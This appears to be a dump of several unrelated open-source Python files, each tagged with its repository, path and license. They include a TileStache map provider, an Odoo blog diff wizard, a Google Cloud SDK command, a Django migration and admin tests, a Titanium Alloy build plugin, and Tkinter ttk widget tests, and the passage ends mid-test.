{'data': 'd1', 'x': 5},
{'data': 'd2', 'x': 6},
{'data': 'd3', 'x': 7},
],
[
(1, 'd1', 5),
(2, 'd2', 6),
(3, 'd3', 7)
],
)
@testing.requires.emulated_lastrowid
def test_implicit_pk_inline(self):
t = self._fixture()
self._test(
t.insert(inline=True).values(data='data', x=5),
(1, 'data', 5),
inserted_primary_key=[]
)
| mit |
SEL-Columbia/TileStache | TileStache/Goodies/Providers/Cascadenik.py | 13 | 1591 | ''' Cascadenik Provider.
Simple wrapper for TileStache Mapnik provider that parses Cascadenik MML files
directly, skipping the typical compilation to XML step.
More information on Cascadenik:
- https://github.com/mapnik/Cascadenik/wiki/Cascadenik
Requires Cascadenik 2.x+.
'''
from tempfile import gettempdir
try:
from ...Mapnik import ImageProvider, mapnik
from cascadenik import load_map
except ImportError:
# can still build documentation
pass
class Provider (ImageProvider):
""" Renders map images from Cascadenik MML files.
Arguments:
- mapfile (required)
Local file path to Mapnik XML file.
- fonts (optional)
Local directory path to *.ttf font files.
- workdir (optional)
Directory path for working files, tempfile.gettempdir() by default.
"""
def __init__(self, layer, mapfile, fonts=None, workdir=None):
""" Initialize Cascadenik provider with layer and mapfile.
"""
self.workdir = workdir or gettempdir()
self.mapnik = None
ImageProvider.__init__(self, layer, mapfile, fonts)
def renderArea(self, width, height, srs, xmin, ymin, xmax, ymax, zoom):
""" Mostly hand off functionality to Mapnik.ImageProvider.renderArea()
"""
if self.mapnik is None:
self.mapnik = mapnik.Map(0, 0)
load_map(self.mapnik, str(self.mapfile), self.workdir, cache_dir=self.workdir)
return ImageProvider.renderArea(self, width, height, srs, xmin, ymin, xmax, ymax, zoom)
| bsd-3-clause |
mustafat/odoo-1 | addons/website_blog/wizard/document_page_show_diff.py | 372 | 2184 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from openerp.tools.translate import _
class showdiff(osv.osv_memory):
""" Disp[ay Difference for History """
_name = 'blog.post.history.show_diff'
def get_diff(self, cr, uid, context=None):
if context is None:
context = {}
history = self.pool.get('blog.post.history')
ids = context.get('active_ids', [])
diff = ""
if len(ids) == 2:
if ids[0] > ids[1]:
diff = history.getDiff(cr, uid, ids[1], ids[0])
else:
diff = history.getDiff(cr, uid, ids[0], ids[1])
elif len(ids) == 1:
old = history.browse(cr, uid, ids[0])
nids = history.search(cr, uid, [('post_id', '=', old.post_id.id)])
nids.sort()
diff = history.getDiff(cr, uid, ids[0], nids[-1])
else:
raise osv.except_osv(_('Warning!'), _('You need to select minimum one or maximum two history revisions!'))
return diff
_columns = {
'diff': fields.text('Diff', readonly=True),
}
_defaults = {
'diff': get_diff
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
harshilasu/GraphicMelon | y/google-cloud-sdk/lib/googlecloudsdk/compute/subcommands/backend_services/update.py | 4 | 2586 | # Copyright 2014 Google Inc. All Rights Reserved.
"""Command for updating backend services."""
import copy
from googlecloudsdk.calliope import exceptions
from googlecloudsdk.compute.lib import backend_services_utils
from googlecloudsdk.compute.lib import base_classes
class Update(base_classes.ReadWriteCommand):
"""Update a backend service."""
@staticmethod
def Args(parser):
backend_services_utils.AddUpdatableArgs(
parser,
default_protocol=None,
default_timeout=None)
parser.add_argument(
'name',
help='The name of the backend service to update.')
@property
def service(self):
return self.compute.backendServices
@property
def resource_type(self):
return 'backendServices'
def CreateReference(self, args):
return self.CreateGlobalReference(args.name)
def GetGetRequest(self, args):
return (
self.service,
'Get',
self.messages.ComputeBackendServicesGetRequest(
project=self.project,
backendService=self.ref.Name()))
def GetSetRequest(self, args, replacement, _):
return (
self.service,
'Update',
self.messages.ComputeBackendServicesUpdateRequest(
project=self.project,
backendService=self.ref.Name(),
backendServiceResource=replacement))
def Modify(self, args, existing):
replacement = copy.deepcopy(existing)
if args.description:
replacement.description = args.description
elif args.description is not None:
replacement.description = None
health_checks = backend_services_utils.GetHealthChecks(args, self)
if health_checks:
replacement.healthChecks = health_checks
if args.timeout:
replacement.timeoutSec = args.timeout
if args.port:
replacement.port = args.port
if args.port_name:
replacement.portName = args.port_name
if args.protocol:
replacement.protocol = (self.messages.BackendService
.ProtocolValueValuesEnum(args.protocol))
return replacement
def Run(self, args):
if not any([
args.protocol,
args.description is not None,
args.http_health_checks,
args.timeout is not None,
args.port,
args.port_name,
]):
raise exceptions.ToolException('At least one property must be modified.')
return super(Update, self).Run(args)
Update.detailed_help = {
'brief': 'Update a backend service',
'DESCRIPTION': """
*{command}* is used to update backend services.
""",
}
| gpl-3.0 |
sergei-maertens/django | django/contrib/sites/migrations/0001_initial.py | 378 | 1134 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import django.contrib.sites.models
from django.contrib.sites.models import _simple_domain_name_validator
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = []
operations = [
migrations.CreateModel(
name='Site',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('domain', models.CharField(
max_length=100, verbose_name='domain name', validators=[_simple_domain_name_validator]
)),
('name', models.CharField(max_length=50, verbose_name='display name')),
],
options={
'ordering': ('domain',),
'db_table': 'django_site',
'verbose_name': 'site',
'verbose_name_plural': 'sites',
},
bases=(models.Model,),
managers=[
('objects', django.contrib.sites.models.SiteManager()),
],
),
]
| bsd-3-clause |
koushikpillai/simplecalci | plugins/ti.alloy/plugin.py | 1729 | 5251 | import os, sys, subprocess, hashlib
import subprocess
def check_output(*popenargs, **kwargs):
r"""Run command with arguments and return its output as a byte string.
Backported from Python 2.7 as it's implemented as pure python on stdlib.
>>> check_output(['/usr/bin/python', '--version'])
Python 2.6.2
"""
process = subprocess.Popen(stdout=subprocess.PIPE, *popenargs, **kwargs)
output, unused_err = process.communicate()
retcode = process.poll()
if retcode:
cmd = kwargs.get("args")
if cmd is None:
cmd = popenargs[0]
error = subprocess.CalledProcessError(retcode, cmd)
error.output = output
raise error
return output
def compile(config):
paths = {}
binaries = ["alloy","node"]
dotAlloy = os.path.abspath(os.path.join(config['project_dir'], 'build', '.alloynewcli'))
if os.path.exists(dotAlloy):
print "[DEBUG] build/.alloynewcli file found, skipping plugin..."
os.remove(dotAlloy)
else:
for binary in binaries:
try:
# see if the environment variable is defined
paths[binary] = os.environ["ALLOY_" + ("NODE_" if binary == "node" else "") + "PATH"]
except KeyError as ex:
# next try PATH, and then our guess paths
if sys.platform == "darwin" or sys.platform.startswith('linux'):
userPath = os.environ["HOME"]
guessPaths = [
"/usr/local/bin/"+binary,
"/opt/local/bin/"+binary,
userPath+"/local/bin/"+binary,
"/opt/bin/"+binary,
"/usr/bin/"+binary,
"/usr/local/share/npm/bin/"+binary
]
try:
binaryPath = check_output(["which",binary], stderr=subprocess.STDOUT).strip()
print "[DEBUG] %s installed at '%s'" % (binary,binaryPath)
except:
print "[WARN] Couldn't find %s on your PATH:" % binary
print "[WARN] %s" % os.environ["PATH"]
print "[WARN]"
print "[WARN] Checking for %s in a few default locations:" % binary
for p in guessPaths:
sys.stdout.write("[WARN] %s -> " % p)
if os.path.exists(p):
binaryPath = p
print "FOUND"
break
else:
print "not found"
binaryPath = None
if binaryPath is None:
print "[ERROR] Couldn't find %s" % binary
sys.exit(1)
else:
paths[binary] = binaryPath
# no guesses on windows, just use the PATH
elif sys.platform == "win32":
paths["alloy"] = "alloy.cmd"
f = os.path.abspath(os.path.join(config['project_dir'], 'app'))
if os.path.exists(f):
print "[INFO] alloy app found at %s" % f
rd = os.path.abspath(os.path.join(config['project_dir'], 'Resources'))
devicefamily = 'none'
simtype = 'none'
version = '0'
deploytype = 'development'
if config['platform']==u'ios':
version = config['iphone_version']
devicefamily = config['devicefamily']
deploytype = config['deploytype']
if config['platform']==u'android':
builder = config['android_builder']
version = builder.tool_api_level
deploytype = config['deploy_type']
if config['platform']==u'mobileweb':
builder = config['mobileweb_builder']
deploytype = config['deploytype']
cfg = "platform=%s,version=%s,simtype=%s,devicefamily=%s,deploytype=%s," % (config['platform'],version,simtype,devicefamily,deploytype)
if sys.platform == "win32":
cmd = [paths["alloy"], "compile", f, "--no-colors", "--config", cfg]
else:
cmd = [paths["node"], paths["alloy"], "compile", f, "--no-colors", "--config", cfg]
print "[INFO] Executing Alloy compile:"
print "[INFO] %s" % " ".join(cmd)
try:
print check_output(cmd, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as ex:
if hasattr(ex, 'output'):
print ex.output
print "[ERROR] Alloy compile failed"
retcode = 1
if hasattr(ex, 'returncode'):
retcode = ex.returncode
sys.exit(retcode)
except EnvironmentError as ex:
print "[ERROR] Unexpected error with Alloy compiler plugin: %s" % ex.strerror
sys.exit(2)
| apache-2.0 |
avneesh91/django | tests/admin_views/test_multidb.py | 23 | 2467 | from unittest import mock
from django.conf.urls import url
from django.contrib import admin
from django.contrib.auth.models import User
from django.db import connections
from django.test import TestCase, override_settings
from django.urls import reverse
from .models import Book
class Router:
target_db = None
def db_for_read(self, model, **hints):
return self.target_db
db_for_write = db_for_read
site = admin.AdminSite(name='test_adminsite')
site.register(Book)
urlpatterns = [
url(r'^admin/', site.urls),
]
@override_settings(ROOT_URLCONF=__name__, DATABASE_ROUTERS=['%s.Router' % __name__])
class MultiDatabaseTests(TestCase):
multi_db = True
@classmethod
def setUpTestData(cls):
cls.superusers = {}
cls.test_book_ids = {}
for db in connections:
Router.target_db = db
cls.superusers[db] = User.objects.create_superuser(
username='admin', password='something', email='[email protected]',
)
b = Book(name='Test Book')
b.save(using=db)
cls.test_book_ids[db] = b.id
@mock.patch('django.contrib.admin.options.transaction')
def test_add_view(self, mock):
for db in connections:
Router.target_db = db
self.client.force_login(self.superusers[db])
self.client.post(
reverse('test_adminsite:admin_views_book_add'),
{'name': 'Foobar: 5th edition'},
)
mock.atomic.assert_called_with(using=db)
@mock.patch('django.contrib.admin.options.transaction')
def test_change_view(self, mock):
for db in connections:
Router.target_db = db
self.client.force_login(self.superusers[db])
self.client.post(
reverse('test_adminsite:admin_views_book_change', args=[self.test_book_ids[db]]),
{'name': 'Test Book 2: Test more'},
)
mock.atomic.assert_called_with(using=db)
@mock.patch('django.contrib.admin.options.transaction')
def test_delete_view(self, mock):
for db in connections:
Router.target_db = db
self.client.force_login(self.superusers[db])
self.client.post(
reverse('test_adminsite:admin_views_book_delete', args=[self.test_book_ids[db]]),
{'post': 'yes'},
)
mock.atomic.assert_called_with(using=db)
| bsd-3-clause |
jlspyaozhongkai/Uter | third_party_backup/Python-2.7.9/Lib/lib-tk/test/test_ttk/test_widgets.py | 13 | 57843 | import unittest
import Tkinter as tkinter
from Tkinter import TclError
import ttk
from test.test_support import requires, run_unittest
import sys
from test_functions import MockTclObj
from support import (AbstractTkTest, tcl_version, get_tk_patchlevel,
simulate_mouse_click)
from widget_tests import (add_standard_options, noconv, noconv_meth,
AbstractWidgetTest, StandardOptionsTests,
IntegerSizeTests, PixelSizeTests,
setUpModule)
requires('gui')
class StandardTtkOptionsTests(StandardOptionsTests):
def test_class(self):
widget = self.create()
self.assertEqual(widget['class'], '')
errmsg='attempt to change read-only option'
if get_tk_patchlevel() < (8, 6, 0): # actually this was changed in 8.6b3
errmsg='Attempt to change read-only option'
self.checkInvalidParam(widget, 'class', 'Foo', errmsg=errmsg)
widget2 = self.create(class_='Foo')
self.assertEqual(widget2['class'], 'Foo')
def test_padding(self):
widget = self.create()
self.checkParam(widget, 'padding', 0, expected=('0',))
self.checkParam(widget, 'padding', 5, expected=('5',))
self.checkParam(widget, 'padding', (5, 6), expected=('5', '6'))
self.checkParam(widget, 'padding', (5, 6, 7),
expected=('5', '6', '7'))
self.checkParam(widget, 'padding', (5, 6, 7, 8),
expected=('5', '6', '7', '8'))
self.checkParam(widget, 'padding', ('5p', '6p', '7p', '8p'))
self.checkParam(widget, 'padding', (), expected='')
def test_style(self):
widget = self.create()
self.assertEqual(widget['style'], '')
errmsg = 'Layout Foo not found'
if hasattr(self, 'default_orient'):
errmsg = ('Layout %s.Foo not found' %
getattr(self, 'default_orient').title())
self.checkInvalidParam(widget, 'style', 'Foo',
errmsg=errmsg)
widget2 = self.create(class_='Foo')
self.assertEqual(widget2['class'], 'Foo')
# XXX
pass
class WidgetTest(AbstractTkTest, unittest.TestCase):
"""Tests methods available in every ttk widget."""
def setUp(self):
super(WidgetTest, self).setUp()
self.widget = ttk.Button(self.root, width=0, text="Text")
self.widget.pack()
self.widget.wait_visibility()
def test_identify(self):
self.widget.update_idletasks()
self.assertEqual(self.widget.identify(
self.widget.winfo_width() // 2,
self.widget.winfo_height() // 2
), "label")
self.assertEqual(self.widget.identify(-1, -1), "")
self.assertRaises(tkinter.TclError, self.widget.identify, None, 5)
self.assertRaises(tkinter.TclError, self.widget.identify, 5, None)
self.assertRaises(tkinter.TclError, self.widget.identify, 5, '')
def test_widget_state(self):
# XXX not sure about the portability of all these tests
self.assertEqual(self.widget.state(), ())
self.assertEqual(self.widget.instate(['!disabled']), True)
# changing from !disabled to disabled
self.assertEqual(self.widget.state(['disabled']), ('!disabled', ))
# no state change
self.assertEqual(self.widget.state(['disabled']), ())
# change back to !disable but also active
self.assertEqual(self.widget.state(['!disabled', 'active']),
('!active', 'disabled'))
# no state changes, again
self.assertEqual(self.widget.state(['!disabled', 'active']), ())
self.assertEqual(self.widget.state(['active', '!disabled']), ())
def test_cb(arg1, **kw):
return arg1, kw
self.assertEqual(self.widget.instate(['!disabled'],
test_cb, "hi", **{"msg": "there"}),
('hi', {'msg': 'there'}))
# attempt to set invalid statespec
currstate = self.widget.state()
self.assertRaises(tkinter.TclError, self.widget.instate,
['badstate'])
self.assertRaises(tkinter.TclError, self.widget.instate,
['disabled', 'badstate'])
# verify that widget didn't change its state
self.assertEqual(currstate, self.widget.state())
# ensuring that passing None as state doesn't modify current state
self.widget.state(['active', '!disabled'])
self.assertEqual(self.widget.state(), ('active', ))
class AbstractToplevelTest(AbstractWidgetTest, PixelSizeTests):
_conv_pixels = noconv_meth
@add_standard_options(StandardTtkOptionsTests)
class FrameTest(AbstractToplevelTest, unittest.TestCase):
OPTIONS = (
'borderwidth', 'class', 'cursor', 'height',
'padding', 'relief', 'style', 'takefocus',
'width',
)
def create(self, **kwargs):
return ttk.Frame(self.root, **kwargs)
@add_standard_options(StandardTtkOptionsTests)
class LabelFrameTest(AbstractToplevelTest, unittest.TestCase):
OPTIONS = (
'borderwidth', 'class', 'cursor', 'height',
'labelanchor', 'labelwidget',
'padding', 'relief', 'style', 'takefocus',
'text', 'underline', 'width',
)
def create(self, **kwargs):
return ttk.LabelFrame(self.root, **kwargs)
def test_labelanchor(self):
widget = self.create()
self.checkEnumParam(widget, 'labelanchor',
'e', 'en', 'es', 'n', 'ne', 'nw', 's', 'se', 'sw', 'w', 'wn', 'ws',
errmsg='Bad label anchor specification {}')
self.checkInvalidParam(widget, 'labelanchor', 'center')
def test_labelwidget(self):
widget = self.create()
label = ttk.Label(self.root, text='Mupp', name='foo')
self.checkParam(widget, 'labelwidget', label, expected='.foo')
label.destroy()
class AbstractLabelTest(AbstractWidgetTest):
def checkImageParam(self, widget, name):
image = tkinter.PhotoImage(master=self.root, name='image1')
image2 = tkinter.PhotoImage(master=self.root, name='image2')
self.checkParam(widget, name, image, expected=('image1',))
self.checkParam(widget, name, 'image1', expected=('image1',))
self.checkParam(widget, name, (image,), expected=('image1',))
self.checkParam(widget, name, (image, 'active', image2),
expected=('image1', 'active', 'image2'))
self.checkParam(widget, name, 'image1 active image2',
expected=('image1', 'active', 'image2'))
self.checkInvalidParam(widget, name, 'spam',
errmsg='image "spam" doesn\'t exist')
def test_compound(self):
widget = self.create()
self.checkEnumParam(widget, 'compound',
'none', 'text', 'image', 'center',
'top', 'bottom', 'left', 'right')
def test_state(self):
widget = self.create()
self.checkParams(widget, 'state', 'active', 'disabled', 'normal')
def test_width(self):
widget = self.create()
self.checkParams(widget, 'width', 402, -402, 0)
@add_standard_options(StandardTtkOptionsTests)
class LabelTest(AbstractLabelTest, unittest.TestCase):
OPTIONS = (
'anchor', 'background',
'class', 'compound', 'cursor', 'font', 'foreground',
'image', 'justify', 'padding', 'relief', 'state', 'style',
'takefocus', 'text', 'textvariable',
'underline', 'width', 'wraplength',
)
_conv_pixels = noconv_meth
def create(self, **kwargs):
return ttk.Label(self.root, **kwargs)
def test_font(self):
widget = self.create()
self.checkParam(widget, 'font',
'-Adobe-Helvetica-Medium-R-Normal--*-120-*-*-*-*-*-*')
@add_standard_options(StandardTtkOptionsTests)
class ButtonTest(AbstractLabelTest, unittest.TestCase):
OPTIONS = (
'class', 'command', 'compound', 'cursor', 'default',
'image', 'state', 'style', 'takefocus', 'text', 'textvariable',
'underline', 'width',
)
def create(self, **kwargs):
return ttk.Button(self.root, **kwargs)
def test_default(self):
widget = self.create()
self.checkEnumParam(widget, 'default', 'normal', 'active', 'disabled')
def test_invoke(self):
success = []
btn = ttk.Button(self.root, command=lambda: success.append(1))
btn.invoke()
self.assertTrue(success)
@add_standard_options(StandardTtkOptionsTests)
class CheckbuttonTest(AbstractLabelTest, unittest.TestCase):
OPTIONS = (
'class', 'command', 'compound', 'cursor',
'image',
'offvalue', 'onvalue',
'state', 'style',
'takefocus', 'text', 'textvariable',
'underline', 'variable', 'width',
)
def create(self, **kwargs):
return ttk.Checkbutton(self.root, **kwargs)
def test_offvalue(self):
widget = self.create()
self.checkParams(widget, 'offvalue', 1, 2.3, '', 'any string')
def test_onvalue(self):
widget = self.create()
self.checkParams(widget, 'onvalue', 1, 2.3, '', 'any string')
def test_invoke(self):
success = []
def cb_test():
success.append(1)
return "cb test called"
cbtn = ttk.Checkbutton(self.root, command=cb_test)
# the variable automatically created by ttk.Checkbutton is actually
# undefined till we invoke the Checkbutton
self.assertEqual(cbtn.state(), ('alternate', ))
self.assertRaises(tkinter.TclError, cbtn.tk.globalgetvar,
cbtn['variable'])
res = cbtn.invoke()
self.assertEqual(res, "cb test called")
self.assertEqual(cbtn['onvalue'],
cbtn.tk.globalgetvar(cbtn['variable']))
self.assertTrue(success)
cbtn['command'] = ''
res = cbtn.invoke()
self.assertFalse(str(res))
self.assertLessEqual(len(success), 1)
self.assertEqual(cbtn['offvalue'],
cbtn.tk.globalgetvar(cbtn['variable']))
@add_standard_options(IntegerSizeTests, StandardTtkOptionsTests)
class ComboboxTest(AbstractWidgetTest, unittest.TestCase):
OPTIONS = (
'class', 'cursor', 'exportselection', 'height',
'justify', 'postcommand', 'state', 'style',
'takefocus', 'textvariable', 'values', 'width',
)
def setUp(self):
super(ComboboxTest, self).setUp()
self.combo = self.create()
def create(self, **kwargs):
return ttk.Combobox(self.root, **kwargs)
def test_height(self):
widget = self.create()
self.checkParams(widget, 'height', 100, 101.2, 102.6, -100, 0, '1i')
def test_state(self):
widget = self.create()
self.checkParams(widget, 'state', 'active', 'disabled', 'normal')
def _show_drop_down_listbox(self):
width = self.combo.winfo_width()
self.combo.event_generate('<ButtonPress-1>', x=width - 5, y=5)
self.combo.event_generate('<ButtonRelease-1>', x=width - 5, y=5)
self.combo.update_idletasks()
def test_virtual_event(self):
success = []
self.combo['values'] = [1]
self.combo.bind('<<ComboboxSelected>>',
lambda evt: success.append(True))
self.combo.pack()
self.combo.wait_visibility()
height = self.combo.winfo_height()
self._show_drop_down_listbox()
self.combo.update()
self.combo.event_generate('<Return>')
self.combo.update()
self.assertTrue(success)
def test_postcommand(self):
success = []
self.combo['postcommand'] = lambda: success.append(True)
self.combo.pack()
self.combo.wait_visibility()
self._show_drop_down_listbox()
self.assertTrue(success)
# testing postcommand removal
self.combo['postcommand'] = ''
self._show_drop_down_listbox()
self.assertEqual(len(success), 1)
def test_values(self):
def check_get_current(getval, currval):
self.assertEqual(self.combo.get(), getval)
self.assertEqual(self.combo.current(), currval)
self.assertEqual(self.combo['values'],
() if tcl_version < (8, 5) else '')
check_get_current('', -1)
self.checkParam(self.combo, 'values', 'mon tue wed thur',
expected=('mon', 'tue', 'wed', 'thur'))
self.checkParam(self.combo, 'values', ('mon', 'tue', 'wed', 'thur'))
self.checkParam(self.combo, 'values', (42, 3.14, '', 'any string'))
self.checkParam(self.combo, 'values', () if tcl_version < (8, 5) else '')
self.combo['values'] = ['a', 1, 'c']
self.combo.set('c')
check_get_current('c', 2)
self.combo.current(0)
check_get_current('a', 0)
self.combo.set('d')
check_get_current('d', -1)
# testing values with empty string
self.combo.set('')
self.combo['values'] = (1, 2, '', 3)
check_get_current('', 2)
# testing values with empty string set through configure
self.combo.configure(values=[1, '', 2])
self.assertEqual(self.combo['values'],
('1', '', '2') if self.wantobjects else
'1 {} 2')
# testing values with spaces
self.combo['values'] = ['a b', 'a\tb', 'a\nb']
self.assertEqual(self.combo['values'],
('a b', 'a\tb', 'a\nb') if self.wantobjects else
'{a b} {a\tb} {a\nb}')
# testing values with special characters
self.combo['values'] = [r'a\tb', '"a"', '} {']
self.assertEqual(self.combo['values'],
(r'a\tb', '"a"', '} {') if self.wantobjects else
r'a\\tb {"a"} \}\ \{')
# out of range
self.assertRaises(tkinter.TclError, self.combo.current,
len(self.combo['values']))
# it expects an integer (or something that can be converted to int)
self.assertRaises(tkinter.TclError, self.combo.current, '')
# testing creating combobox with empty string in values
combo2 = ttk.Combobox(self.root, values=[1, 2, ''])
self.assertEqual(combo2['values'],
('1', '2', '') if self.wantobjects else '1 2 {}')
combo2.destroy()
@add_standard_options(IntegerSizeTests, StandardTtkOptionsTests)
class EntryTest(AbstractWidgetTest, unittest.TestCase):
OPTIONS = (
'background', 'class', 'cursor',
'exportselection', 'font',
'invalidcommand', 'justify',
'show', 'state', 'style', 'takefocus', 'textvariable',
'validate', 'validatecommand', 'width', 'xscrollcommand',
)
def setUp(self):
super(EntryTest, self).setUp()
self.entry = self.create()
def create(self, **kwargs):
return ttk.Entry(self.root, **kwargs)
def test_invalidcommand(self):
widget = self.create()
self.checkCommandParam(widget, 'invalidcommand')
def test_show(self):
widget = self.create()
self.checkParam(widget, 'show', '*')
self.checkParam(widget, 'show', '')
self.checkParam(widget, 'show', ' ')
def test_state(self):
widget = self.create()
self.checkParams(widget, 'state',
'disabled', 'normal', 'readonly')
def test_validate(self):
widget = self.create()
self.checkEnumParam(widget, 'validate',
'all', 'key', 'focus', 'focusin', 'focusout', 'none')
def test_validatecommand(self):
widget = self.create()
self.checkCommandParam(widget, 'validatecommand')
def test_bbox(self):
self.assertIsBoundingBox(self.entry.bbox(0))
self.assertRaises(tkinter.TclError, self.entry.bbox, 'noindex')
self.assertRaises(tkinter.TclError, self.entry.bbox, None)
def test_identify(self):
self.entry.pack()
self.entry.wait_visibility()
self.entry.update_idletasks()
self.assertEqual(self.entry.identify(5, 5), "textarea")
self.assertEqual(self.entry.identify(-1, -1), "")
self.assertRaises(tkinter.TclError, self.entry.identify, None, 5)
self.assertRaises(tkinter.TclError, self.entry.identify, 5, None)
self.assertRaises(tkinter.TclError, self.entry.identify, 5, '')
def test_validation_options(self):
success = []
test_invalid = lambda: success.append(True)
self.entry['validate'] = 'none'
self.entry['validatecommand'] = lambda: False
self.entry['invalidcommand'] = test_invalid
self.entry.validate()
self.assertTrue(success)
self.entry['invalidcommand'] = ''
self.entry.validate()
self.assertEqual(len(success), 1)
self.entry['invalidcommand'] = test_invalid
self.entry['validatecommand'] = lambda: True
self.entry.validate()
self.assertEqual(len(success), 1)
self.entry['validatecommand'] = ''
self.entry.validate()
self.assertEqual(len(success), 1)
self.entry['validatecommand'] = True
self.assertRaises(tkinter.TclError, self.entry.validate)
def test_validation(self):
validation = []
def validate(to_insert):
if not 'a' <= to_insert.lower() <= 'z':
validation.append(False)
return False
validation.append(True)
return True
self.entry['validate'] = 'key'
self.entry['validatecommand'] = self.entry.register(validate), '%S'
self.entry.insert('end', 1)
self.entry.insert('end', 'a')
self.assertEqual(validation, [False, True])
self.assertEqual(self.entry.get(), 'a')
def test_revalidation(self):
def validate(content):
for letter in content:
if not 'a' <= letter.lower() <= 'z':
return False
return True
self.entry['validatecommand'] = self.entry.register(validate), '%P'
self.entry.insert('end', 'avocado')
self.assertEqual(self.entry.validate(), True)
self.assertEqual(self.entry.state(), ())
self.entry.delete(0, 'end')
self.assertEqual(self.entry.get(), '')
self.entry.insert('end', 'a1b')
self.assertEqual(self.entry.validate(), False)
self.assertEqual(self.entry.state(), ('invalid', ))
self.entry.delete(1)
self.assertEqual(self.entry.validate(), True)
self.assertEqual(self.entry.state(), ())
@add_standard_options(IntegerSizeTests, StandardTtkOptionsTests)
class PanedWindowTest(AbstractWidgetTest, unittest.TestCase):
OPTIONS = (
'class', 'cursor', 'height',
'orient', 'style', 'takefocus', 'width',
)
def setUp(self):
super(PanedWindowTest, self).setUp()
self.paned = self.create()
def create(self, **kwargs):
return ttk.PanedWindow(self.root, **kwargs)
def test_orient(self):
widget = self.create()
self.assertEqual(str(widget['orient']), 'vertical')
errmsg='attempt to change read-only option'
if get_tk_patchlevel() < (8, 6, 0): # actually this was changed in 8.6b3
errmsg='Attempt to change read-only option'
self.checkInvalidParam(widget, 'orient', 'horizontal',
errmsg=errmsg)
widget2 = self.create(orient='horizontal')
self.assertEqual(str(widget2['orient']), 'horizontal')
def test_add(self):
# attempt to add a child that is not a direct child of the paned window
label = ttk.Label(self.paned)
child = ttk.Label(label)
self.assertRaises(tkinter.TclError, self.paned.add, child)
label.destroy()
child.destroy()
# another attempt
label = ttk.Label(self.root)
child = ttk.Label(label)
self.assertRaises(tkinter.TclError, self.paned.add, child)
child.destroy()
label.destroy()
good_child = ttk.Label(self.root)
self.paned.add(good_child)
# re-adding a child is not accepted
self.assertRaises(tkinter.TclError, self.paned.add, good_child)
other_child = ttk.Label(self.paned)
self.paned.add(other_child)
self.assertEqual(self.paned.pane(0), self.paned.pane(1))
self.assertRaises(tkinter.TclError, self.paned.pane, 2)
good_child.destroy()
other_child.destroy()
self.assertRaises(tkinter.TclError, self.paned.pane, 0)
def test_forget(self):
self.assertRaises(tkinter.TclError, self.paned.forget, None)
self.assertRaises(tkinter.TclError, self.paned.forget, 0)
self.paned.add(ttk.Label(self.root))
self.paned.forget(0)
self.assertRaises(tkinter.TclError, self.paned.forget, 0)
def test_insert(self):
self.assertRaises(tkinter.TclError, self.paned.insert, None, 0)
self.assertRaises(tkinter.TclError, self.paned.insert, 0, None)
self.assertRaises(tkinter.TclError, self.paned.insert, 0, 0)
child = ttk.Label(self.root)
child2 = ttk.Label(self.root)
child3 = ttk.Label(self.root)
self.assertRaises(tkinter.TclError, self.paned.insert, 0, child)
self.paned.insert('end', child2)
self.paned.insert(0, child)
self.assertEqual(self.paned.panes(), (str(child), str(child2)))
self.paned.insert(0, child2)
self.assertEqual(self.paned.panes(), (str(child2), str(child)))
self.paned.insert('end', child3)
self.assertEqual(self.paned.panes(),
(str(child2), str(child), str(child3)))
# reinserting a child should move it to its current position
panes = self.paned.panes()
self.paned.insert('end', child3)
self.assertEqual(panes, self.paned.panes())
# moving child3 to child2 position should result in child2 ending up
# in previous child position and child ending up in previous child3
# position
self.paned.insert(child2, child3)
self.assertEqual(self.paned.panes(),
(str(child3), str(child2), str(child)))
def test_pane(self):
self.assertRaises(tkinter.TclError, self.paned.pane, 0)
child = ttk.Label(self.root)
self.paned.add(child)
self.assertIsInstance(self.paned.pane(0), dict)
self.assertEqual(self.paned.pane(0, weight=None),
0 if self.wantobjects else '0')
# newer form for querying a single option
self.assertEqual(self.paned.pane(0, 'weight'),
0 if self.wantobjects else '0')
self.assertEqual(self.paned.pane(0), self.paned.pane(str(child)))
self.assertRaises(tkinter.TclError, self.paned.pane, 0,
badoption='somevalue')
def test_sashpos(self):
self.assertRaises(tkinter.TclError, self.paned.sashpos, None)
self.assertRaises(tkinter.TclError, self.paned.sashpos, '')
self.assertRaises(tkinter.TclError, self.paned.sashpos, 0)
child = ttk.Label(self.paned, text='a')
self.paned.add(child, weight=1)
self.assertRaises(tkinter.TclError, self.paned.sashpos, 0)
child2 = ttk.Label(self.paned, text='b')
self.paned.add(child2)
self.assertRaises(tkinter.TclError, self.paned.sashpos, 1)
self.paned.pack(expand=True, fill='both')
self.paned.wait_visibility()
curr_pos = self.paned.sashpos(0)
self.paned.sashpos(0, 1000)
self.assertNotEqual(curr_pos, self.paned.sashpos(0))
self.assertIsInstance(self.paned.sashpos(0), int)
@add_standard_options(StandardTtkOptionsTests)
class RadiobuttonTest(AbstractLabelTest, unittest.TestCase):
OPTIONS = (
'class', 'command', 'compound', 'cursor',
'image',
'state', 'style',
'takefocus', 'text', 'textvariable',
'underline', 'value', 'variable', 'width',
)
def create(self, **kwargs):
return ttk.Radiobutton(self.root, **kwargs)
def test_value(self):
widget = self.create()
self.checkParams(widget, 'value', 1, 2.3, '', 'any string')
def test_invoke(self):
success = []
def cb_test():
success.append(1)
return "cb test called"
myvar = tkinter.IntVar(self.root)
cbtn = ttk.Radiobutton(self.root, command=cb_test,
variable=myvar, value=0)
cbtn2 = ttk.Radiobutton(self.root, command=cb_test,
variable=myvar, value=1)
if self.wantobjects:
conv = lambda x: x
else:
conv = int
res = cbtn.invoke()
self.assertEqual(res, "cb test called")
self.assertEqual(conv(cbtn['value']), myvar.get())
self.assertEqual(myvar.get(),
